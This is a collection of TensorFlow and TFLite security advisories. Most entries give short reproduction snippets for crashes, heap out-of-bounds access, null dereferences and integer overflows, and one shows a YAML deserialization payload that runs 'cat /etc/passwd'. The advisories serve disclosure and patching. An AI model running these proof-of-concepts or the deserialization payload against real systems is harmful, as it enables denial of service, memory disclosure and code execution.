The strided slice implementation in TFLite has a logic bug which can allow an attacker to trigger an infinite loop. This arises from newly introduced support for ellipsis in axis definition: for (int i = 0; i < effective_dims;) { if ((1 << i) & op_context->params->ellipsis_mask) { // … int ellipsis_end_idx = std::min(i + 1 + num_add_axis + op_context->input_dims - begin_count, effective_dims); // … for (; i < ellipsis_end_idx; ++i) …

Incomplete validation in MKL requantization

Due to incomplete validation in MKL implementation of requantization, an attacker can trigger undefined behavior via binding a reference to a null pointer or can access data outside the bounds of heap allocated arrays: import tensorflow as tf tf.raw_ops.RequantizationRangePerChannel( input=[], input_min=[0,0,0,0,0], input_max=[1,1,1,1,1], clip_value_max=1)

Incomplete validation in `QuantizeV2`

Due to incomplete validation in tf.raw_ops.QuantizeV2, an attacker can trigger undefined behavior via binding a reference to a null pointer or can access data outside the bounds of heap allocated arrays: import tensorflow as tf tf.raw_ops.QuantizeV2( input=[1,2,3], min_range=[1,2], max_range=[], T=tf.qint32, mode='SCALED', round_mode='HALF_AWAY_FROM_ZERO', narrow_range=False, axis=1, ensure_minimum_range=3)

Incomplete validation in `MaxPoolGrad`

An attacker can trigger a denial of service via a segmentation fault in tf.raw_ops.MaxPoolGrad caused by missing validation: import tensorflow as tf tf.raw_ops.MaxPoolGrad( orig_input = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32), orig_output = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32), grad = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32), ksize = [1, 16, 16, 1], strides = [1, 16, 18, 1], padding = "EXPLICIT", explicit_paddings = [0, 0, 14, 3, 15, 5, …

Heap OOB in TFLite's `Gather*` implementations

TFLite's GatherNd implementation does not support negative indices but there are no checks for this situation. Hence, an attacker can read arbitrary data from the heap by carefully crafting a model with negative values in indices. Similar issue exists in Gather implementation. import tensorflow as tf import numpy as np tf.compat.v1.disable_v2_behavior() params = tf.compat.v1.placeholder(name="params", dtype=tf.int64, shape=(1,)) indices = tf.compat.v1.placeholder(name="indices", dtype=tf.int64, shape=()) out = tf.gather(params, indices, name='out') with tf.compat.v1.Session() as sess: …

Heap OOB in TFLite

TFLite's expand_dims.cc contains a vulnerability which allows reading one element outside of bounds of heap allocated data: if (axis < 0) { axis = input_dims.size + 1 + axis; } TF_LITE_ENSURE(context, axis <= input_dims.size); TfLiteIntArray* output_dims = TfLiteIntArrayCreate(input_dims.size + 1); for (int i = 0; i < output_dims->size; ++i) { if (i < axis) { output_dims->data[i] = input_dims.data[i]; } else if (i == axis) { output_dims->data[i] = 1; } else …

Heap OOB in nested `tf.map_fn` with `RaggedTensor`s

It is possible to nest a tf.map_fn within another tf.map_fn call. However, if the input tensor is a RaggedTensor and there is no function signature provided, code assumes the output is a fully specified tensor and fills output buffer with uninitialized contents from the heap: import tensorflow as tf x = tf.ragged.constant([[1,2,3], [4,5], [6]]) t = tf.map_fn(lambda r: tf.map_fn(lambda y: r, r), x) z = tf.ragged.constant([[[1,2,3],[1,2,3],[1,2,3]],[[4,5],[4,5]],[[6]]]) The t and z …

Heap OOB in boosted trees

An attacker can read from outside of bounds of heap allocated data by sending specially crafted illegal arguments to BoostedTreesSparseCalculateBestFeatureSplit: import tensorflow as tf tf.raw_ops.BoostedTreesSparseCalculateBestFeatureSplit( node_id_range=[0,10], stats_summary_indices=[[1, 2, 3, 0x1000000]], stats_summary_values=[1.0], stats_summary_shape=[1,1,1,1], l1=[1.0], l2=[1.0], tree_complexity=[0.5], min_node_weight=[1.0], logits_dimension=3, split_type='inequality')

Heap OOB in `UpperBound` and `LowerBound`

An attacker can read from outside of bounds of heap allocated data by sending specially crafted illegal arguments to tf.raw_ops.UpperBound: import tensorflow as tf tf.raw_ops.UpperBound( sorted_input=[1,2,3], values=tf.constant(value=[[0,0,0],[1,1,1],[2,2,2]],dtype=tf.int64), out_type=tf.int64)

Heap OOB in `ResourceScatterUpdate`

An attacker can trigger a read from outside of bounds of heap allocated data by sending invalid arguments to tf.raw_ops.ResourceScatterUpdate: import tensorflow as tf v = tf.Variable([b'vvv']) tf.raw_ops.ResourceScatterUpdate( resource=v.handle, indices=[0], updates=['1', '2', '3', '4', '5'])

Heap OOB in `RaggedGather`

If the arguments to tf.raw_ops.RaggedGather don't determine a valid ragged tensor, the code can trigger a read from outside of bounds of heap allocated buffers. import tensorflow as tf tf.raw_ops.RaggedGather( params_nested_splits = [0,0,0], params_dense_values = [1,1], indices = [0,0,9,0,0], OUTPUT_RAGGED_RANK=0) In debug mode, the same code triggers a CHECK failure.

Heap OOB and CHECK fail in `ResourceGather`

An attacker can trigger a crash via a CHECK-fail in debug builds of TensorFlow using tf.raw_ops.ResourceGather or a read from outside the bounds of heap allocated data in the same API in a release build: import tensorflow as tf tensor = tf.constant(value=[[1,2],[3,4],[5,6]],shape=(3,2),dtype=tf.uint32) v = tf.Variable(tensor) tf.raw_ops.ResourceGather( resource=v.handle, indices=[0], dtype=tf.uint32, batch_dims=10, validate_indices=False)

Heap buffer overflow in `FractionalAvgPoolGrad`

The implementation for tf.raw_ops.FractionalAvgPoolGrad can be tricked into accessing data outside of bounds of heap allocated buffers: import tensorflow as tf import numpy as np tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=[0,1,2,3], out_backprop = np.array([[[[541],[541]],[[541],[541]]]]), row_pooling_sequence=[0, 0, 0, 0, 0], col_pooling_sequence=[-2, 0, 0, 2, 0], overlapping=True)

FPE in LSH in TFLite

An attacker can craft a TFLite model that would trigger a division by zero error in LSH implementation. int RunningSignBit(const TfLiteTensor* input, const TfLiteTensor* weight, float seed) { int input_item_bytes = input->bytes / SizeOfDimension(input, 0); // … } There is no check that the first dimension of the input is non zero.

Division by zero in TFLite

The implementation of fully connected layers in TFLite is vulnerable to a division by zero error: const int batch_size = input_size / filter->dims->data[1]; An attacker can craft a model such that filter->dims->data[1] is 0.

Division by 0 in most convolution operators

Most implementations of convolution operators in TensorFlow are affected by a division by 0 vulnerability where an attacker can trigger a denial of service via a crash: import tensorflow as tf tf.compat.v1.disable_v2_behavior() tf.raw_ops.Conv2D( input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32), filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32), strides = [1, 1, 1, 1], padding = "SAME")

Division by 0 in `ResourceGather`

An attacker can trigger a crash via a floating point exception in tf.raw_ops.ResourceGather: import tensorflow as tf tensor = tf.constant(value=[[]],shape=(0,1),dtype=tf.uint32) v = tf.Variable(tensor) tf.raw_ops.ResourceGather( resource=v.handle, indices=[0], dtype=tf.uint32, batch_dims=1, validate_indices=False)

Crash caused by integer conversion to unsigned

An attacker can cause a denial of service in boosted_trees_create_quantile_stream_resource by using negative arguments: import tensorflow as tf from tensorflow.python.ops import gen_boosted_trees_ops import numpy as np v= tf.Variable([0.0, 0.0, 0.0, 0.0, 0.0]) gen_boosted_trees_ops.boosted_trees_create_quantile_stream_resource( quantile_stream_resource_handle = v.handle, epsilon = [74.82224], num_streams = [-49], max_elements = np.int32(586))

Bad alloc in `StringNGrams` caused by integer conversion

The implementation of tf.raw_ops.StringNGrams is vulnerable to an integer overflow issue caused by converting a signed integer value to an unsigned one and then allocating memory based on this value. import tensorflow as tf tf.raw_ops.StringNGrams( data=['',''], data_splits=[0,2], separator=' '*100, ngram_widths=[-80,0,0,-60], left_pad=' ', right_pad=' ', pad_width=100, preserve_short_sequences=False)

Arbitrary code execution due to YAML deserialization

TensorFlow and Keras can be tricked into performing arbitrary code execution when deserializing a Keras model from YAML format. from tensorflow.keras import models payload = ''' !!python/object/new:type args: ['z', !!python/tuple [], {'extend': !!python/name:exec }] listitems: "__import__('os').system('cat /etc/passwd')" ''' models.model_from_yaml(payload)

`std::abort` raised from `TensorListReserve`

Providing a negative element to num_elements list argument of tf.raw_ops.TensorListReserve causes the runtime to abort the process due to reallocating a std::vector to have a negative number of elements: import tensorflow as tf tf.raw_ops.TensorListReserve( element_shape = tf.constant([1]), num_elements=tf.constant([-1]), element_dtype = tf.int32)

`CHECK`-fail in `MapStage`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.MapStage: import tensorflow as tf tf.raw_ops.MapStage( key=tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), indices=tf.constant((0), dtype=tf.int32), values=[tf.constant((0), dtype=tf.int32)], dtypes=[tf.int32, tf.int64], capacity=0, memory_limit=0, container='', shared_name='')

Exposure of Resource to Wrong Sphere

TensorFlow allows attackers to overwrite arbitrary files via a crafted archive when tf.keras.utils.get_file is used with extract=True. NOTE: the vendor's position is that tf.keras.utils.get_file is not intended for untrusted archives.
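
For context, a hedged sketch of the call pattern in question (the URL and filename are placeholders for an untrusted source):

    import tensorflow as tf

    # With extract=True the downloaded archive is unpacked locally; a crafted
    # archive from an untrusted origin can then place files at paths of the
    # attacker's choosing.
    path = tf.keras.utils.get_file(
        fname='data.tar.gz',
        origin='https://example.com/data.tar.gz',  # placeholder untrusted URL
        extract=True)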

Undefined behavior in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding)

Undefined behavior and `CHECK`-fail in `FractionalMaxPoolGrad`

The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers an undefined behavior if one of the input tensors is empty: import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad( orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False) The code is also vulnerable to a denial of service attack as a …

Type confusion during tensor casts leads to dereferencing null pointers

Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors results in null pointer dereferences. There are multiple ways to reproduce this; a few examples are listed here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …

Stack overflow due to looping TFLite subgraph

TFLite graphs must not contain loops between nodes. However, this condition was not checked, so an attacker could craft models that result in an infinite loop during evaluation. In certain cases, the infinite loop is replaced by a stack overflow due to too many recursive calls.

Segfault in tf.raw_ops.ImmutableConst

Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") … Segmentation fault

Segfault in SparseCountSparseOutput

Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault thrown from the standard library, as std::vector invariants are broken. import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)

Segfault in `CTCBeamSearchDecoder`

Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults: import tensorflow as tf inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], shape=[8], dtype=tf.int32) beam_width = 10 top_paths = 3 merge_repeated = True tf.raw_ops.CTCBeamSearchDecoder( inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, top_paths=top_paths, merge_repeated=merge_repeated)

Reference binding to nullptr in `SdcaOptimizer`

The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …

Reference binding to null pointer in `MatrixDiag*` ops

The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null: import tensorflow as tf d = tf.convert_to_tensor([],dtype=tf.float32) p = tf.convert_to_tensor([],dtype=tf.float32) tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.

Reference binding to null in `ParameterizedTruncatedNormal`

An attacker can trigger undefined behavior by binding to null pointer in tf.raw_ops.ParameterizedTruncatedNormal: import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxvals = tf.constant((1), dtype=tf.float32) tf.raw_ops.ParameterizedTruncatedNormal( shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)

Overflow/denial of service in `tf.raw_ops.ReverseSequence`

The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service. import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)

OOB read in `MatrixTriangularSolve`

The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …

Null pointer dereference via invalid Ragged Tensors

Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference.

Null pointer dereference in TFLite's `Reshape` operator

The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …

Null pointer dereference in `StringNGrams`

An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams: import tensorflow as tf data=tf.constant([''] * 11, shape=[11], dtype=tf.string) splits = [0]*115 splits.append(3) data_splits=tf.constant(splits, shape=[116], dtype=tf.int64) tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss', ngram_widths=[7,6,11], left_pad='ABCDE', right_pad=b'ZYXWVU', pad_width=50, preserve_short_sequences=True)

Null pointer dereference in `SparseFillEmptyRows`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) dense_shape = tf.constant([], shape=[0], dtype=tf.int64) default_value = 0 tf.raw_ops.SparseFillEmptyRows( indices=indices, values=values, dense_shape=dense_shape, default_value=default_value)

Null pointer dereference in `EditDistance`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance: import tensorflow as tf hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64) hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32) hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64) truth_values = tf.constant([], shape=[0], dtype=tf.float32) truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) tf.raw_ops.EditDistance( hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values, hypothesis_shape=hypothesis_shape, truth_indices=truth_indices, truth_values=truth_values, truth_shape=truth_shape, normalize=True)

Memory corruption in `DrawBoundingBoxesV2`

The implementation of tf.raw_ops.DrawBoundingBoxesV2 can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)

Lack of validation in `SparseDenseCwiseMul`

Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data: import tensorflow as tf indices = tf.constant([], shape=[10, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) shape = tf.constant([0, 0], shape=[2], dtype=tf.int64) dense = tf.constant([], shape=[0], dtype=tf.int64) tf.raw_ops.SparseDenseCwiseMul( sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)

Invalid validation in `SparseMatrixSparseCholesky`

An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape = [1, 1] st = tf.SparseTensor(indices_array, value_array, dense_shape) input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape) permutation = tf.constant([], shape=[1, 0], dtype=tf.int32) tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)

Invalid validation in `QuantizeAndDequantizeV2`

The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for axis argument: import tensorflow as tf input_tensor = tf.constant([0.0], shape=[1], dtype=float) input_min = tf.constant(-10.0) input_max = tf.constant(-10.0) tf.raw_ops.QuantizeAndDequantizeV2( input=input_tensor, input_min=input_min, input_max=input_max, signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)

Integer overflow in TFLite memory allocation

The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; return sizeof(dummy) + sizeof(dummy.data[0]) * size; } An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in invalid value being given to malloc: TfLiteIntArray* TfLiteIntArrayCreate(int size) { TfLiteIntArray* ret = …
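
A rough arithmetic sketch of the threshold (assuming a 4-byte int and a 4-byte TfLiteIntArray header; both are platform-dependent assumptions, not values from the advisory):

# Assumed sizes; they depend on the platform and struct layout.
INT_SIZE = 4      # sizeof(dummy.data[0])
HEADER_SIZE = 4   # sizeof(dummy)

# Smallest size for which HEADER_SIZE + INT_SIZE * size no longer fits in a
# signed 32-bit int, so the computed byte count wraps around.
threshold = (2**31 - HEADER_SIZE) // INT_SIZE
print(threshold)  # 536870911 under these assumptions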

Integer overflow in TFLite concatenation

The TFLite implementation of concatenation is vulnerable to an integer overflow issue: for (int d = 0; d < t0->dims->size; ++d) { if (d == axis) { sum_axis += t->dims->data[axis]; } else { TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); } } An attacker can craft a model such that the dimensions of one of the concatenation inputs overflow the values of the int type. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …

Incomplete validation in `tf.raw_ops.CTCLoss`

Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap: import tensorflow as tf inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32) labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64) labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32) sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32) tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, labels_values=labels_values, sequence_length=sequence_length, preprocess_collapse_repeated=True, ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True) An attacker can also trigger a heap buffer overflow: import tensorflow as tf inputs = tf.constant([], shape=[7, 2, …

Incomplete validation in `SparseReshape`

Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure. import tensorflow as tf input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64) input_shape = tf.zeros([11], dtype=tf.int64) new_shape = tf.zeros([1], dtype=tf.int64) tf.raw_ops.SparseReshape(input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)

Incomplete validation in `SparseAdd`

Incomplete validation in SparseAdd results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: import tensorflow as tf a_indices = tf.zeros([10, 97], dtype=tf.int64) a_values = tf.zeros([10], dtype=tf.int64) a_shape = tf.zeros([0], dtype=tf.int64) b_indices = tf.zeros([0, 0], dtype=tf.int64) b_values = tf.zeros([0], dtype=tf.int64) b_shape = tf.zeros([0], dtype=tf.int64) thresh = 0 tf.raw_ops.SparseAdd(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=thresh)

Heap out of bounds write in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\ size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\ binary_output=False)

Heap out of bounds read in `RequantizationRange`

The implementation of tf.raw_ops.RequantizationRange can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([1], shape=[1], dtype=tf.qint32) input_max = tf.constant([], dtype=tf.float32) input_min = tf.constant([], dtype=tf.float32) tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)

Heap out of bounds read in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32) argmax = tf.constant([1], shape=[1], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)

Heap out of bounds in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) t_min = tf.constant([], shape=[0], dtype=tf.float32) t_max = tf.constant([], shape=[0], dtype=tf.float32) m = tf.constant([1], shape=[1], dtype=tf.quint8) m_min = tf.constant([], shape=[0], dtype=tf.float32) m_max = tf.constant([], shape=[0], dtype=tf.float32) v = tf.constant([1], shape=[1], dtype=tf.quint8) v_min = tf.constant([], shape=[0], dtype=tf.float32) v_max = tf.constant([], shape=[0], dtype=tf.float32) …

Heap OOB write in TFLite

A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of ArgMin/ArgMax: TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } If axis_value is not a value between 0 and NumDimensions(input), then the condition in the if is never true, so …

Heap OOB read in TFLite

A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of Split_V: const int input_size = SizeOfDimension(input, axis_value); If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array: inline int SizeOfDimension(const TfLiteTensor* t, int dim) { return t->dims->data[dim]; }

Heap OOB read in `tf.raw_ops.Dequantize`

Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data: import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …

Heap OOB in `QuantizeAndDequantizeV3`

An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3: import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3)

Heap OOB and null pointer dereference in `RaggedTensorToTensor`

Due to lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can exploit an undefined behavior if input arguments are empty: import tensorflow as tf shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) default_value = tf.constant(404, dtype=tf.int64) row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64) rows = [row] types = ['ROW_SPLITS'] tf.raw_ops.RaggedTensorToTensor( shape=shape, values=values, default_value=default_value, row_partition_tensors=rows, row_partition_types=types)

Heap OOB access in unicode ops

An attacker can access data outside of bounds of heap allocated array in tf.raw_ops.UnicodeEncode: import tensorflow as tf input_values = tf.constant([58], shape=[1], dtype=tf.int32) input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) output_encoding = "UTF-8" tf.raw_ops.UnicodeEncode( input_values=input_values, input_splits=input_splits, output_encoding=output_encoding)

Heap OOB access in `Dilation2DBackpropInput`

An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32) out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32) tf.raw_ops.Dilation2DBackpropInput( input=input_tensor, filter=filter, out_backprop=out_backprop, strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')

Heap buffer overflow in `StringNGrams`

An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams: import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `SparseTensorToCSRSparseMatrix`

An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([0.0], dtype=np.float32) dense_shape = [0, 0] st = tf.SparseTensor(indices_array, value_array, dense_shape) values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape)

Heap buffer overflow in `SparseSplit`

An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit: import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1)

Heap buffer overflow in `RaggedTensorToTensor`

